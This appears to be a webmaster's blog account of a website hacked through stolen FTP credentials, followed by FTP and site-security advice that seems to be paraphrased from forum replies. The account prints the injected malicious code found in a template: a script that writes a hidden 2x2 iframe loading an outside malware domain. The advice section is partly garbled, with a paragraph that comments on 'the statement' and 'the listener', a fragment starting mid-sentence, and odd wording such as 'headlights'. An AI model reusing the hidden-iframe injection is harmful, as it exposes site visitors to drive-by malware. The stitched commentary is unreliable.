I recently received an unexpected letter from Google in my mailbox: It seems that some of the pages on my website could pose a threat to my visitors' computer security, with one potentially harmful page.



After running a re-check through webmaster.google.com, I was assured everything was fine. However, I still decided to compare all of my site's files with last year's to ensure there hadn't been any changes. Unfortunately, it turned out that 12 files did differ from their previous version.

What I discovered in the header.tpl file was particularly shocking. Instead of the expected line:

<body style="background: url(<?=PATH_WEB?>img/main_bg.gif) repeat-y center #244e9f;">

I found this malicious code:

<body style="background: url(<?=PATH_WEB?><!--c3284d--> type="text/javascript">
dоcument.write('<iframe src="https://yourgraff.cu.cc/in.cgi?11" name="Google"scrolling="auto"frameborder="no" align="center" height="2" width="2"></iframe>');
</script><!--/c3284d-->

img/main_bg.gif) repeat-y center #244e9f;">

This kind of malware is widespread. If you search on Google for "yogotraff," you'll find it in the code of many sites. Of course, I restored the affected files, changed my passwords, and asked my hosting provider how the infection occurred. After investigating, I received logs showing that someone from an American address (208.77.96.72) had entered two of my FTP accounts and replaced a number of files. I asked my provider to check for virus infections on my computer, which was cleared by both DrWeb and Kaspersky bootable disks. The whole experience made me realize how scary it can be to live with the constant threat of cyber attacks and malicious software.

The statement, "It's complicated, you can't pick it up," suggests a complex situation that is difficult to resolve. This could be related to various issues such as security breaches, hacking, or technology problems.

One possible suggestion for addressing potential security issues is to consider utilizing SSH/SFTP instead of solely relying on FTP. While it's unclear whether the listener or reader has this in place already, the comment highlights the importance of considering more secure options for transmitting data and protecting confidential information.

common situation where Trojan malware can steal FTP passwords and compromise websites, possibly due to a prior virus infection. To address this, it's suggested to search for the Trojan on all computers with FTP access to the site, even those outside the primary network. Changing the FTP password is a critical step in securing the site, along with setting permissions on files to prevent overwriting via FTP. In addition, periodically adjusting these permissions can provide added protection against unauthorized changes to the website.

As mentioned earlier, a common occurrence involves logging onto a website from a computer at least once. For quite some time now, Trojans have been capable of obtaining passwords from various sources including the "headlights" of widely-used programs such as "Total Commander".

To prevent unauthorized access, it's highly recommended to regularly change your passwords. Additionally, it's important to keep track of login attempts and restrict incoming IP addresses on your FTP server.

The majority of website hacks and infections occur through vulnerabilities in the site script code. In order to protect yourself from hacking attempts, a comprehensive check of all scripts is necessary to search for potential vulnerabilities. These vulnerabilities can enable hackers to perform undesirable actions if certain requests are made to the site. Regular monitoring for CMS updates and add-ons is also paramount. Immediate updates should be made and suspicious requests to the site should be closely monitored in logs. It is strongly urged to avoid installing any add-ons or themes from untrusted sources as they may contain intentional vulnerabilities.

Periodically browsing online forums about site security may also provide valuable information about new malware threats and preventative measures. Additionally, it's important to protect access passwords from viruses by not using them in public networks such as internet cafes and free Wi-Fi. Changing your password periodically and maintaining virus-free computers are crucial steps in protecting against hacking and infection.

If you suspect your site has been infected, changing the FTP password and ordering a backup copy or restoring the site from a previous copy are the first steps. It's also recommended to update your CMS, antivirus, and check for viruses on your computer. Specialized external services and scripts can be used to examine sites for extraneous files and viruses, and HTTP POST requests can be analyzed for vulnerable site scripts and malicious files. Finally, it's important to note that the FTP protocol is not encrypted and data is transmitted in plain text, making it susceptible to spyware interception. For added security, consider using secure access instead of FTP.